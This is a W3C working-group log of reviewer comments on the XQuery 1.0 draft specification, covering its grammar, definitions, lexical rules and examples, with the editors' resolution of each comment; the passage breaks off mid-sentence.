Overtaken by events. This section has been rewritten. SECTION 2.2.5 : Consistency constraints second para, definition: "...For a given node in the data model..." But the data model is an abstraction, and it is not particular to the run-time environment in which an expression is evaluated. A node, on the other hand, is a data value, found in the run-time environment. Thus "in" can not mean any kind of physical or logical containment in the phrase "node in the data model". What you probably mean is "node, as defined by the Data Model specification." But there is no need to qualify every occurrence of "node" with such a phrase, because the only data that XQuery considers is data that conforms to the Data Model specification. Thus this sentence reduces to just "for a given node". - Steve B. Requests deletion of certain occurrences of this phrase. Status: Accepted and implemented. SECTION no specific location Words and phrases appear in bold throughout the document. There is no description of the convention being followed. It appears to be that a bolded word or phrase has a formal definition somewhere. There does not appear to be a consistent convention about whether a bolded phrase is appearing in its own definition, or the definition is merely being referenced. For example, most of the bolded words in section 2 "Basics" appear within the [Definition:...] convention, which is fairly self-explanatory (although widely misused for things that are not really definitions at all, but that is the subject of other comments). On the other hand, in section 3.7.3 "Computed constructors", the phrases "name expression" and "content expression" are bolded, and their definitions are here, though not enclosed in the [Definition: ...] convention. These same phrases appear in other passages in bold, where they are to be understood as references back to the definition. The point is that there is no consistency about how to tell whether a use of bolding indicates a definition, or a reference to a definition. By way of contrast, a common convention is that a term is italicized when it is being defined, and not italicized when it is being referenced. - Steve B. Observes that some bold terms appear in definitions and some do not. Status: This is true and I have a work item to invest more effort in adding termdefs and termrefs to the document, but I do not consider this to be high-priority work. I do not think this work is a prerequisite to entering Last Call. SECTION no specific locaton: none Many of the things called definitions are not. A definition should tell a reader how to recongize something when he comes across it, or how to find or construct a thing. Consider this definition from 2.4.4.4 "Matching an AttributeTest..." "[Definition: An AttributeTest is used to match an attribute node by its name and/or type.]" This is like saying "[Definition: a bulldozer is used to move dirt.]" A true fact, but I still don't know a bulldozer when I see one, nor how to build a bulldozer. If all I had was this definition, I might think a shovel or a dump truck was a bulldozer. Coming back to the definition I cited, the actual definition of AttributeTest is found in rule [130]. Perhaps the things defined by EBNF need no [Definition:...]. Eliminating definitions of things defined in the EBNF would be a start, but there are many other improper definitions. Consider setion 2.6.6 "Must-understand extensions", first para: "[Definition: An implementation may extend XQuery functionality by supporting must-understand extensions. A must-understand extension may be used anywhere that ignorable whitespace is allowed.]" This is not a definition, it is discussion of the properties of a must-understand extension. - Steve B. Gives two examples of non-helpful definitions and claims there are many more. Status: The two examples cited have been eliminated. If further changes are required, please submit specific change proposals. Appendices Editorial Some appendices seem to be explicitly marked as non-normative. Some that are not marked should be marked so as well: E.g. the precedence table, the glossary etc. Partially done. Normative vs. non-normative must be specified at the level of a whole appendix, and all the normative appendices must come before any non-normative ones. I made the error-code appendix normative and the glossary non-normative, and moved the error-code appendix before the glossary appendix. Appendix A.1 EBNF Editorial Is there a reason why "$" is outside of the production of VarName? We can still use something like <"for" VarName> to indicate the necessary token lookahead and define VarName as "$" QName. RESOLUTION: closed, rejected. See [450] RESOLUTION: closed, rejected [[rejected]] Section 4.12 Function Declaration Editorial Non-normative [120]: Why is it (")" | (")" "as" SequenceType)) and not ")" ( "as" SequenceType)? See [432], excerpt: Because the long token has to transit to lexical state ITEMTYPE. Can he live with it? RESOLUTION: qt-2004Feb0797-01 closed with no action Microsoft can live with not making the change. RESOLUTION: qt-2004Feb0797-01 closed with no action Microsoft can live with not making the change. [[rejected]] Section 4.10 xmlspace declaration Editorial/Technical "The xmlspace declaration in a Prolog controls whether boundary whitespace is preserved by element and attribute constructors during execution of the query" -> "The xmlspace declaration in a Prolog controls whether boundary whitespace is preserved by element and attribute constructors during parsing of the query" Also: renaming this property to boundary space or xquery whitespace is acceptable (see Oracle comment). Partially done. Changed "execution of query" to "processing of query". Whitespace preservation does not apply only to parsing, but to the semantics of element construction. Details are found in "Content" subsection of Direct Element Constructors. Section 4.8 Variable Declaration Editorial "All variable names declared in a library module must be explicitly qualified by the namespace prefix of the module's target namespace.[err:XQ0048] ": It should be the namespace URI and not prefix that drives this. Section 4.6 Schema Import Editorial The Note on static typing and DTD is a bit unmotivated. Why do we need to say this here? We have not mentioned DTDs before. Please either remove or make the context more relevant. Section 4.5 Default Namespace Declaration Editorial "The effect of declaring a default function namespace is that all functions in the default function namespace, including implicitly-declared constructor functions, are aliased with a name that has the original local name, but no namespace URI. ": This is a weird way of explaining that the syntactic name resolver will add the namespace URI given as the default if no prefix is specified. Please reword this sentence. I recommend rejection of this comment. It suggests rewording a sentence that was debated for a long time. Since this was a contentious issue it should be changed only by consensus of the working group. Section 4.5 Default Namespace Declaration Editorial "The string literal used in a default namespace declaration must be a valid URI [err:XQ0046], and may be a zero-length string.[err:XQ0046] ": Remove double reference to error. Also see comment MS-XQ-LC1-127 Section 4.4 Namespace Declaration Editorial Please change "The output of the above query is as follows. <foo:bing> Lentils </foo:bing>" to "The output of the above query is as follows. <foo:bing xmlns: Lentils </foo:bing>" Section 4.3 Base URI Declaration Editorial/Technical Please rewrite "A static error [err:XQ0046] is raised if the string literal in a base URI declaration does not contain a valid URI." to "A static error [err:XQ0046] should be raised if the string literal in a base URI declaration does not contain a valid URI." Note that we do not require URI format checks in other contexts either. I recommend rejection of this comment. It suggest changing "an error is raised" to "an error should be raised". The error and its triggering condition remain the same. I see no motivation for making this change. Section 4.2 Module Declaration Editorial "The names of all variables and functions declared in a library module must be explicitly qualified by the target namespace prefix.[err:XQ0048]": When is the error called? What happens with variables and functions inside a library module that does not have the same namespace? Also, please do require the targetnamespace URI and not the prefix to be the same. SECTION 2.2.1 : Prefix Bindings fn: is bound to It should be as defined in the XQuery 1.0 language spec. In general, it is better to refer these common prefix bindings to XQuery 1.0 language spec. - Steve B. Status: Overtaken by events. Each new version of the specification updates these URIs with new dates. SECTION 3.2.1: Steps It says in section 3.2, "This sequence of steps is then evaluated from left to right. Each operation E1/E2 is evaluated as follows: Expression E1 is evaluated, and if the result is not a sequence of nodes, a type error is raised." So query "/a/(1 to 5)[2]" should raise a type error because (1 to 5) does not return a sequence of nodes. However, it also says in section 3.2.1, "A filter step consists simply of a primary expression followed by zero or more predicates. ... This result may contain nodes, atomic values, or any combination of these." This should be clarified, e.g. by saying "a filter step must return a set of nodes when used in a path expression." - Steve B. Overtaken by events. Filter steps are now called filter expressions and are described separately from path expressions. SECTION 3.1.2: Variable References Consider the following query: for $j in (1,2) let $i:= $i +1 return <foo>{$i}</foo> This raises a dynamic error because the $i on the right is not bound yet. This is based on 3.8 Flwor expression rule on variable scope: "The scope does not include the expression to which the variable is bound". However, this is counter-intutive for users who are used to procedural programming and now work on XQuery which is a functional language. It would be better to list this as an example to explain why the variable reference of $i on the right results in dynamic errors. - Steve B. I recommend rejection of this comment. It suggests inserting an example into Section 3.1.2 that requires understanding of FLWOR and constructor expressions, which have not been introduced yet. This example would be helpful in a tutorial, but it is not necessary in a specification. SECTION 2: Basics There is a list of predefined namespace prefixes stated in Basics. It should add xml = as well, which is consistent with 4.4 - Steve B. SECTION 3.7.1.5: Type of a constructed element In 3.7.1.5, the spec states how the type of a constructed element is assigned via automatic schema validation process. The conceptual description here is more or less repeated from 3.13 validate expression. It would be better if the spec made a cross reference to 3.13 here. If there are any inconsistencies between the two, then 3.13 validate Expression should be considered normative. - Steve B. Overtaken by events. Automatic validation is gone. SECTION 3.8.3: Order by and Return Clauses In 3.8.3, it has a rule stated as: "Each orderspec must return values of the same type for all tuples in the tuple stream". Later, the orderspec considers the special values in the orderspec, such as empty sequence. Then, empty sequence should be considered the same type as for all other tuples in the tuple stream. Suggested rewording: "For each position in the tuple, there must exist an atomic type for which the gt operator is defined, such that the value of the orderspec in that position is either the empty sequence or can be promoted to that atomic type". Consider a tuple stream of 2 tuples, the first tuple is empty sequence and the second tuple is an atomic value with type "xs:string" and typed value is "cat". From the spec, it is not clear if this tuple stream is legal for order unless we state that empty sequence is considered the same type as 'xs:string' in this case. - Steve B. SECTION 3.12.2: Typeswitch In 2.5.3 Errors and Optimizations: "To avoid unexpected errors caused by reordering of expressions, tests that are designed to prevent dynamic errors should be expressed using conditional or typeswitch expressions. Conditional and typeswitch expressions raise only dynamic errors that occur in the branch that is actually selected." And in 3.10 Conditional Expressions: "Conditional expressions have a special rule for propagating dynamic errors...." However, for 3.12.2 typeswitch, there is no similar paragraph to state that typeswitch expressions have a special rule for propagating dynamic errors, that is, only the the branch that is actually selected can raise dynamic errors. - Steve B. SECTION 3.9 : Unordered Expressions Unordered Expressions, as defined in 3.9, returns a sequence of items in a nondeterministic order. Consider the following XQuery example defined in 3.2.2 Predicates by applying the additional fn:unordered() function: (fn:unordered(21 to 29))[5] Since fn:unordered() returns a sequence in a nondeterminstic order, it should be clarified that the result can be any integer value between 21 and 29. The behavior needs to be specified in 3.9 and 3.2.2. - Steve B. This comment from a participant (Steve Buxton, Oracle) asks for clarification about the non-determinance of application of fn:unordered() to certain expressions containing a predicate that is a numeric value. This comment is addressed in intent by the "unordered" proposal's specification of non-deterministic results when the "unordered{}" syntax is used. Because that usage is a syntactic shorthand for uses of fn:unordered(), the clear implication is that those uses of fn:unordered() also return non-deterministic results. Subject to proper application of the "unordered" proposal's specifications, this comment is resolved. I consider this comment to be resolved by the "unordered" proposal. SECTION A.2.2: lexical rules OCCURRENCEINDICATOR state table, first row: There is no description of what input_stream.backup(1) means. This should go in the explanatory material at the beginning of this section. - Steve B. See [437] RESOLUTION: accepted, Scott to add explanation [[accepted]] SECTION A.2.2: lexical rules OCCURRENCEINDICATOR state table, first row: There is no pattern called NotOccurrenceIndicator. Probably what is meant is 'anything except "?", "*" or "+"'. A better way to handle this would be to make this the last row of the table rather than the first, and change the Pattern column to something like "(anything other than "?", "*" or "+")". - Steve B. See [440] RESOLUTION: accepted as per item 29 above [[accepted]] SECTION A.2.2: lexical rules The rules in the tables do not appear to allow comments, pragmas and must-know extensions as ignorable whitespace in the middle of certain sequences of tokens. For example, in the DEFAULT state table, first row, last list item, <"declare" "validation">, or more importantly, fourth row, items <"for" "$">, <"let" "$">, <"some" "$">, <"every" "$">. I believe the intention is to permit comments, pragmas and must-know extensions in the midst of these token sequences. Note that there is no recognition of just the first token in these sequences ("declare", "for", "let", "some", "every") so that for example for (: set up loop :) $i in fn:doc("...") is unrecognizable by these tables, and presumably a lexical error. Glancing at the tables, it seems that whenever you enclose a sequence of patterns in angle brackets <...>, that it is not permitted to have a comment. This seems far too limiting. How will users ever learn where they can insert comments? - Steve B. Keep the status quo, but clarify that comments are allowed everywhere that implicit space is. Waiting detailed proposal. ScB: Requesting approval for the intent. A proposal is needed for the details. MK: Jerome seemed to be the lone voice of opposition on this change. ScB: I'll give Jerome a call. ScB: Nothing points to the comment productions (from elsewhere in the grammar). ScB: I don't want to put it explicitly in the BNF, but we need more exposition. DC: These new words will go in the grammar part of the document and don't require any changes to the earlier sections. ScB: I'll start with the grammar appendix and we can review it to see if the change needs to go elsewhere. Accepted: We'll keep the status quo. Waiting detailed proposal. [Liam note: the minutes mention that this issue is closed in several places despite the words "Waiting detailed proposal"] SECTION A.2.1: white space rules It is hard to understand the distinction between /* ws:explicit */ and /* ws:significant */. For example, rule [106] CDataSection and rule [108] XmlComment have been labeled /* ws:significant */, whereas rule [107] XmlPI is labeled /* ws:explicit */. I don't see any difference between these three things from the standpoint of the XML 1.0 Recommendation. What distinction are you trying to make here? - Steve B. SECTION A.2.1: white space rules The definition of /* ws:significant */ says it means "that whitespace is significant as value content". But "Value content" is not defined. Does it mean "the value of the non-terminal on the left hand side of the indicated EBNF rule"? - Steve B. SECTION A.2 : lexical structure The first sentence characterizes the legal characters of XML 1.1 as forming a "larger set" than those of XML 1.0. Actually, it is the other way around: Char in XML 1.1 is a subset of Char in XML 1.0 (a lot of characters called "discouraged" in the XML 1.0 Errata have been removed in XML 1.1). What you may be thinking of in this sentence is that Name in XML 1.1 is a superset of Name in XML 1.0. This is true, but it is not exactly relevant, since XQuery never references Name. Instead, the basic component of your identifiers is NCName, which is defined in either "Namespaces in XML" (i.e., XML 1.0) or "Namespaces in XML 1.1". Unfortunately, D.2 "Normative references" does not reference the latter. In summary, what I think you want for the first sentence is "It is implementation defined whether the lexical rules of [XML 1.0] and [XML Names] are followed, or alternatively, the lexical rules of [XML 1.1] and [XML Names 1.1] are followed." (using [XML Names 1.1] as the normative reference to "Namespaces in XML 1.1"). There are other possible resolutions. One would be that implementations have two choices: 1. whether Char is XML 1.0 or XML 1.1, and 2. whether NCName is playing by 1.0 or 1.1 rules. Another resolution would be that implementations can choose either the most restrictive for both (ie, Char from XML 1.1 and NCName from 1.0) or the most inclusive for both (ie, Char from XML 1.0 and NCName from XML 1.1). - Steve B. See [462] RESOLUTION: Adopted, Scott will remove the incorrect statement RESOLUTION: Adopted, Scott will remove the incorrect statement SECTION A.1.1: grammar notes grammar-note:parens says "a look-ahead of one character is required to distinguish function patterns from a QName followed by a comment." You need to look ahead more than one character in order to distinguish Pragma, MUExtension and ExprComment. - Steve B. See [117]. Yes, needs to be fixed. Waiting complete proposal from scott. SECTION A.1.1: grammar notes grammar-note:parens says "a look-ahead of one character is required to distinguish function patterns from a QName followed by a comment." Look-ahead is also required to distinguish between a function pattern and a keyword, for example "for (: whom the bell :) $tolls =" is the beginning of a ForClause. That's using my notion of what "ignorable whitespace" ought to be, not what it evidently is according to A.2 Lexical rules. - Steve B. See [116]. Yes, needs to be fixed. Waiting complete proposal from scott. SECTION A.1: EBNF Some of the non-terminals duplicate definitions found in XML 1.0, namely rule [106] CDataSection is the same as rule [18] CDSect in XML 1.0; rule [107] XmlPI is the same as rule [16] PI in XML 1.0, and rule [108] XmlComment is the same as rule [15] Comment in XML 1.0. Actually, the rules are stated better in XML 1.0, since that document is careful to exclude the terminating symbols where your rules just have Char*. It would be better to just cite the XML 1.0 definitions. - Steve B. Proposal fails, we keep the status quo. ScB: I think it's a great idea to reference XML for those productions. I think we can work around any parsing obscurities. Proposal: make the change. MK: I feel uneasy, but I don't know why. DC: They make our document less self-contained. JR: Can we compromise by copying it directly? MK: Then we have the problem of which is normative. ScB: Personally, I'd rather just point to the XML spec. Proposal: make the change. Preference poll: 7=no change, 3=change, 5=abstain Proposal fails, we keep the status quo. SECTION 3.2: path expressions Seventh para (excluding rules [69] and [70]), last sentence says "In general it is best to use parentheses when "/" is used as the first operand of an operator, e.g., (/) * 5." And in "grammar-note: leading-lone-slash" in A.1.1 we find: "The "/" presents an issue because it occurs both in a leading position and an operator position in expressions. Thus, expressions such as "/ * 5" can easily be confused with the path expression "/*". Therefore, a stand-alone slash, in a leading position, that is followed by an operator, will need to be parenthesized in order to stand alone, as in "(/) * 5". "5 * /", on the other hand, is fine. " It will help to augment the example like this: "4 + / * 5" is a parse error, because the slash, although it appears following the + operator, is still the first operand of the * operator. On the other hand, "4 * / + 5" is not a parse error, because it is equivalent to "(4 * /) + 5", meaning that the slash is not the first operand of an operator. In "4*/*5", is the "/" a "leading slash" ? Is "/div 2" legal ? We recommend using "Should, Must or May" in place of e.g. "will need to be". - Steve B. See [439]. RESOLUTION: Don: use MUST as per comment. Add the 4 + / * 5 with blanks but not the (incorrect) 4 * / + 5 example. The way to avoid the parse error is to put ( ) around the leading slash to make (/). Scott noted that the suggested examples in the comment may be incorrect: 4 * / + 5 is also a parse error. RESOLUTION: Don: use MUST as per comment. Add the 4 + / * 5 with blanks but not the (incorrect) 4 * / + 5 example. The way to avoid the parse error is to put ( ) around the leading slash to make (/). [[accepted]] SECTION 3.2 : path expressions Seventh para (excluding rules [69] and [70]) says "For instance, "/*" is an expression with a wildcard, and "/*5" is a parse error". It would help to mention that use of whitespace will not alter this analysis: "/ *" is an expression with a wildcard, but "/ * 5" is a parse error. - Steve B. See [438]. RESOLUTION: Don to add white space as described RESOLUTION: Don to add white space as described [[accepted]] SECTION 3.1.6: XQuery comments Rule [4] ExprCommentContent refers to /* gn: parens */. The text of that grammar note does not appear to be relevant to rule [4], since the grammar note only talks about distinguishing a function from a comment. Perhaps what is meant is that, when processing the interior of a comment, if you encounter "(", you need to look ahead one more character to see if the "(" is part of ExprCommentContent or the beginning of a new ExprComment. If so, grammar note gn:parens needs to be enhanced to discuss this issue. - Steve B. Proposal accepted. Overtaken by events. The referenced grammar note no longer exists. SECTION 3.1.6: XQuery coments It says that "Comments may be used anywhere ignorable whitespace is allowed" but there is no definition of ignorable whitespace, only a reference to section A.2 Lexical rules. The rules in that section are so dense that most readers will find them unintelligible. It would be helpful to provide a reader-friendly definition of "ignorable whitespace". - Steve B. Requests a reader-friendly definition of "ignorable whitespace." Unfortunately I do not know such a definition. The technical definition in Appendix A.2 is referenced. If the submitter of this comment can make this definition reader-friendly, I encourage him to submit a specific wording. SECTION 2.6.5: pragmas Rule [1] Pragma has an attached grammar note gn:parens, but the text of that grammar note does not appear to be relevant, since the grammar note only talks about distinguishing function calls from comments. Perhaps the note needs to talk about doing two character look-ahead to distinguish function calls, comments and pragmas. Though that is still not enough look-ahead, because you also have MUExtensions to distinguish. This requires scanning over indefinitely long whitespace (which might itself be comments) before you come to the keywords "pragma" or "extension". - Steve B. Proposal accepted. Overtaken by events. The referenced grammar note no longer exists. SECTION 2.2.5 : Consistency constraints First bullet: "for every data model node...": what is a "data model node"? I think this term is undefined; I think the term you want is just "node". The second bullet also uses this term. I suggest searching for "data model" and checking that each use is correct. - Steve B. SECTION 2.2.5 : Consistency constraints First sentence: "In order for XQuery to be well defined, the data model, the static context, and the dynamic context must be mutually consistent." This is a misuse of the term "data model". The data model is an abstract framework, whereas the static context and dynamic context are values present in the run-time environment of the evaluation of an XQuery expression. Presumably what you mean is that the data (not the data model) must be consistent with the static and dynamic contexts. Perhaps changing "data model" to "data model instance" in this location would resolve the issue? - Steve B. SECTION 2.2.3.2 : Dynamic evaulation phase The second sentence refers to "the value of the query". "Query" is undefined; perhaps you mean "the value of the expression". - Steve B. SECTION 2.2 : Processing model The paragraph below the figure mentions "an area labeled the external processing domain". Actually, it is labeled just "External Processing". Similarly the label inside the thick black line is "Query Processing", not "query processing domain". - Steve B. SECTION 2.2: processing model First para after figure 1, third sentence: "The external processing domain includes the generation of the data model". But the data model is an abstract framework describing the kind of data found during an XQuery execution. Confer "XQuery 1.0 and XPath 2.0 Data Model" Introduction, second para, for a definition of "data model". If anything "includes the generation of the data model" it has been the W3C group working on that specification. Perhaps what you mean here is "The external processing domain includes the generation of the data." Of course, the data forms a time-varying collection of values, so it might be more accurate to say "The external processing domain includes the generation of the initial values of the data." - Steve B. SECTION 2.1.2: dynamic context The definition of "current date and time" refers to "processing of a query or transformation". These are undefined terms. Section 2 "Basics" first sentence says that the "basic building block of XQuery is the expression". What is the relationship between expression, query and transformation? - Steve B. Partially done. All references to "transformation" have been made XPath-only. The assumption is that XSLT users will understand the concept of a transformation, and XQuery users will understand the concept of a query. SECTION 2.1.2: dynamic context It says "the context item is the item currently being processed in a path expression". But a path expression is a piece of syntax, and an item is a value, so an item is not "in" a path expression. I think you mean "the item currently being processed in the evaluation of a path expression". Similarly in the definitions of context position and context size. - Steve B. Fixed as a side effect of processing another comment. These definitions no longer refer to path expressions. SECTION 2.1.1: Static context Validation context: said to be "either global or a context path that starts with the name of a top-level element...". What if there is a top-level element called "global"? I think you mean that the validation context consists of two things: a flag, whose value is "global" or "not global", and a path, which is ignored when the flag is "global". Perhaps saying that the path starts with a QName (not just a "name") would help, if that insures that "global" is never a value of the lexical space of paths. - Steve B. Overtaken by events. "Validation context" no longer exists. SECTION 2.1.1: Static context In-scope collations: it says that "a collation may be regarded...". The use of "a" in "a collation", together with "may", is not clear. Is this universal quantification ("every collation may be regarded..."), existential ("there exists a collation that may be regarded...") or just totally permissive ("perhaps there exists a collation that may be regarded...")? My own interpretation of your words is that you are not trying to prescribe how a collation is implemented, but that, no matter how it is implemented, it shall be open to the interpretation that it is an object with two functions in its interface. This might be better expressed "a collation is effectively an object with two functions...". - Steve B. SECTION 2.1.1: static context In-scope collations: it says that a collation "may be regarded...". Unlike F&O, there is no definition of "may". The F&O definition ("Conforming documents and processors are permitted to, but need not, behave as described") does not seem appropriate here. Is an implementation permitted, but not required, to "regard" a collation as an object with two functions? I don't think an implementation can "regard" anything, since "regarding" is a mental act (though implementers, their product literature and their users might have such a mental model). - Steve B. SECTION 2.1.1: static context I'm unsure if this is a typo in third and fourth "hollow circle" bullets (those for default element/type namespace and default function namespace): "environmentor". Should this be "environment or", or perhaps there is an undefined noun "environmentor", which presumably is something that creates or initializes the environment. - Steve B. SECTION 2.2.3: Expression Processing 2.2.3 refers to type errors, dynamic errors, static errors, which are defined in 2.5.1. Suggest adding a line under the first paragraph of 2.2.3 saying "During expression processing, the following errors may be raised .... These errors are defined at 2.5.1" - Steve B. Section 3.12.6 Treat Editorial Provide an example and motivation for treating across. An example for treating across is: the static type is a union of T1 | T2 and you want to pass this to a function that only allows T1. Suggests adding an example of "treat". I think the existing example is adequate. The suggested example uses a notation (T1 | T2) that has not been introduced in the language document. I would prefer to reject this comment. Section 3.12.3 Cast Editorial Use item, sequence of item or atomic value instead of value as appropriate. Suggests avoiding the use of the word "value". Duplicate of comment 2004Jan/0146. I believe that the usages of the word "value" in this section are appropriate, and I think this comment should be rejected. Section 3.12.2 Typeswitch Editorial . If the return expression does not depend on the value of the operand expression, the variable may be omitted from the case or default clause." : Please rewrite along the line of: "If return depends on value, Variable is required, otherwise it does not matter" Sections 3.12.2/3.12.6 Editorial Add link to Sequence Type Matching. Also please attempt to make such references more consistent across the document. Section 3.12 Expressions on SequenceTypes Editorial "This example returns true if the context item is an element node. If the context item is undefined, a dynamic error is raised." : Also add case when context item is not an element node but defined. Section 3.12 Expressions on SequenceTypes Editorial Replace "<a>{5}</a> instance of xs:integer This example returns false because the given value is not an integer; instead, it is an element containing an integer." with "<a>{5}</a> instance of xs:integer This example returns false because the given item is an element and not an integer." Note that the content of the element depends on schema and validation context. Section 3.11 Quantified Expressions Editorial Make the term "effective boolean value" consistent in the document: Either always bold, or always a link. Done. (But in some cases where "effective boolean value" appears multiple times in the same paragraph, I make only the first occurrence a link to avoid a cluttered appearance.) Section 3.11 Quantified Expressions Editorial Replace (("some" "$") | ("every" "$")) VarName with ("some" | "every") "$" VarName In the non-normative grammar. proposal accepted. (Comment is rejected.) We follow Scott's proposal instead. [[rejected]] This is a requested grammar change that was rejected in joint telcon 183 on 5/11/04. Section 3.8.4 Example Editorial/Technical "for $a in fn:distinct-values($books)//author": is not correct. Fn:distinct-values returns a list of atomic values and cannot be used in a path expression. General Comment Examples We should reduce the amount of examples that use // and instead write them with the full path. This is giving a bad example to users in cases where a clear path exists. Eliminated "//" operators from many examples by specifying more explicit paths. This was a fairly extensive change, and people will want to review it carefully during the internal review. Section 3.8.4 Example Editorial "The input bibliography is a list of books in which each book contains a list of authors. ": Mention that it is bound to the variable $books Section 3.8.3 Order By and Return Clauses Editorial Please add to orderspec rules whether an orderspec may be a union of promotable types (such as xdt:untypedAtomic | xs:string, xs:integer|xs:double). Section 3.8.1 For and Let Clauses Editorial Replace "for $x in $w let $y := f($x) for $z in g($x, $y) return h($x, $y, $z) " with "for $x in $w, $a in f($x) let $y := f($a) for $z in g($x, $y) return h($x, $y, $z) " to show order in for list. Section 3.8.1 For and Let Clauses Editorial "for $i in (1, 2), $j in (3, 4) The tuple stream generated by the above for clause ": Rewrite this into a full XQuery expression. Same for example for "at". Suggests that an example in the For-clause section that illustrates a For-clause should be expanded to a full XQuery expression. I believe this is not necessary and would make the example less clear rather than more clear. Section 3.7.3.7 Computed Namespace Constructor Editorial Wouldn't it be clearer if we move this into a subsection of the element constructor? (see also comment: MS-XQ-LC1-081). Overtaken by events. We no longer have computed namespace node constructors. Sections 3.7.3.5/3.7.3.6 Editorial Show XML serialization of constructed node in examples. Section 3.7.3.2 Computed Attribute Constructor Editorial Replace "The value of the size attribute is "7"." with "The value of the size attribute is "7" of type xdt:untypedAtomic." Sections 3.7.1.*/3.7.3.* Editorial Can some of the constructor rules be expressed by using the fn:string-join() function instead of prose? Suggests an alternative approach to defining element constructors. The would be a big change, but the suggestion is not specific enough to act upon. I do not think there is anything broken about the current definition of element constructors. I would prefer to reject this comment. Section 3.7.3.2 Computed Attribute Constructor Editorial Replace "Atomization is applied to the value of the content expression" with "Atomization is applied to the result of the content expression" Section 3.7.3.1 Computed Element Constructor Editorial The two examples for constructed names seem redundant. Only keep one. Suggests deleting one of the two examples of computed element constructors (does not specify which one). I think both examples are helpful and illustrate different applications of computed constructors. I would prefer to reject this comment. Section 3.7.3.1 Computed Element Constructor Editorial It is not clear if the new element with twice the numeric content is typed or not. Make this clearer. All constructed elements are untyped until they are validated. This is a change since the Last Call document that provoked this comment. I would make no change, and classify this comment as "overtaken by events." Sections 3.7.1.*/3.7.3.* Editorial Can we combine the common construction rules in one place and refer to it in the other? That way we guarantee consistency. Section 3.7.1.4 Whitespace in Element Content Editorial "If xmlspace is not declared in the prolog or is declared as xmlspace = strip, boundary whitespace is not considered significant and is discarded.": Make this sentence dependent on xmlspace policy in static context and not on value in prolog (since that may be given in an implementation-defined place). Section 3.7 Constructors Editorial "Constructors are provided for every kind of node in the data model ([XQuery 1.0 and XPath 2.0 Data Model]). ": We do not really provide a namespace node constructor, only a namespace declaration component to the element constructor. Overtaken by events. The XQuery document no longer discusses namespace nodes. Section 3.5.3 Node Comparisons Editorial Example: //book[isbn="1558604820"] is //book[call="QA76.9 C3845"] will statically fail. Provide static wording as well, eg exactly-one(//book[isbn="1558604820"]) is exactly-one(//book[call="QA76.9 C3845"]). Same for //purchase[parcel="28-451"] << //sale[parcel="33-870"]. M.Rys requests that a type-safe form of a query example be added. The existing example compares books and parcels with specific keys, intending to suggest that they represent singleton values. Status: Recommend to reject. This is a special case of the working group decision not to require all our examples to be type-safe. Section 3.3.1 Constructing Sequences Editorial Make "In places where the grammar calls for ExprSingle, such as the arguments of a function call, any expression that contains a top-level comma operator must be enclosed in parentheses. " a note. Section 3.3.1 Constructing Sequences Editorial Please replace "A sequence may contain duplicate values or nodes" with "A sequence may contain duplicate atomic values or nodes" Section 3.3.1 Constructing Sequences Editorial Please replace "the resulting values, in order, into a single result sequence" with "the resulting sequences, in order, into a single result sequence". Section 3.2.4 Abbreviated Syntax Editorial Please replace "// is effectively replaced by " with "// is syntactically replaced by ". Otherwise we have a conflict with section 3.2 in the beginning. I don't see any conflict. Section 3.2 states that // is expanded according to the rules in Section 3.2.4, and Section 3.2.4 provides the rules. I think this comment should be rejected. Section 3.2.4 Abbreviated Syntax Editorial Can I write section/@attribute(id)? Please also explain again what child::section/attribute::attribute(id) means. M.Rys requests an explanation of the step attribute::attribute(id). Status: Recommend to reject. I think the description is sufficiently clear. The step searches on the attribute axis to find an attribute named id with any type annotation. Section 3.2.3 Unabbreviated Syntax Editorial ", and otherwise selects nothing" is the case for all expressions. Remove since explained in previous section. (changed "selects nothing" to "returns an empty sequence".) Section 3.2.3 Unabbreviated Syntax Editorial "child::node()": mention that no attributes are returned. Section 3.2.2 Predicates Editorial Please add an example that uses more than one predicate (e.g., E[p1][p2]) and where the second predicate depends on the context of the first predicate. I don't understand "E[p1][p2] where the second predicate depends on the context of the first predicate". Predicates are independent. The result of E is filtered by p1, and the result of E[p1] is filtered again by p2. I think this comment should be rejected. Section 3.2.1.2 Node Tests Editorial "mixed" -> "interleaved" and add definition/reference to definition of "interleaved". Section 3.2.1.1 Axes Editorial "the preceding-sibling axis contains the context node's preceding siblings, those children of the context node's parent that occur before the context node in document order; if the context node is an attribute node or namespace node, the following-sibling axis is empty": replace following-sibling with preceding-sibling Section 3.2.1.1 Axes Editorial XQuery does not really expose namespace nodes. Should we remove them from this discussion? XQuery: editorial, minor Section 2.1.1 defines the signature of a function. It is common practice to define the signature of a function as the static types of the arguments and of the results, and to not add the name of the function to it. We suggest we eliminate the name of the function from the signature. Suggests removing function name from function signature in static context. But the name of the function is needed in the static context, and "function signature" is the name we have chosen for this context item. I think this comment should be rejected. XQuery: editorial, minor Section 3.8.3. says: The order by clause is the only facility provided by XQuery for specifying an order other than document order. Therefore, every query in which an order other than document order is required must contain a FLWOR expression, even though iteration would not otherwise be necessary. This statement is not true. The ",", i.e. the sequence concatenation operator creates sequences in other orders then the document order for example. XQuery: editorial, minor Section 3.7.3: references to xs:anyType and xs;anySimpleType have to be replaced with xdt:untyped and xdt:untypedtomic. Done, but some references to xs:anyType and xs:anySimpleType remain in appropriate places. XQuery: editorial, minor Section 3.7.1.3 and 3.7.1.4 talk about the xmlspace declaration in the query's prolog. This should be replaced with the xmlspace property in the static context of the query instead. XQuery: editorial, minor Section 3.2.2 point 1 describes the case where the value of the predicate is numeric. We should make explicit that the two values have to be equal via the eq value comparison. XQuery: editorial, minor Section 2.4.4.3 talks about an element "having the nilability property". This should be replaced with "having the nillability property being true", because all elements have the nillability property (some true, some false). Overtaken by events. This section has been extensively rewritten. XQuery: editorial, minor Section 2.1.2 defines the context item as being the current item being processed as part of a path expression. This should not be limited to path expressions. The current item can be used in any Xquery expression. XQuery: editorial, minor Section 2 third paragraph states that the name of a node is a Qname. It should be an optional Qname. Wants the name of a node to be an "optional QName". Current text states that some nodes have names, and the name of a node is a QName. I believe these two statements, taken together, are accurate and complete. I think this comment should be rejected. XQuery: editorial, major First paragraph in section 2 notes that the language does not allow variable substitution if the definition expression creates new nodes. This is only a particular case where variable substitution (and function inlining in the same time) does not hold, but there are other causes: validation context and element constructors with namespace declarations. This particular "feature" of XQuery that the semantics of an expression depends on the *syntactical* context it is placed in makes XQuery very different from most other programming languages. We should devote some space to explain this "feature" in more details potentially using some examples. Dana says that, in the very beginning of the "Basics" section, where we first say that XQuery is a functional language, we should add some examples illustrating obscure reasons why it is not really a functional language after all (because of element constructors with namespace declarations etc.) These examples would depend on features that are not introduced until much later. Status: Recommend to reject. I do not think the proposed examples would be helpful to the reader at this point in the document. I am not sure they would be helpful at all. If Dana feels strongly about this I 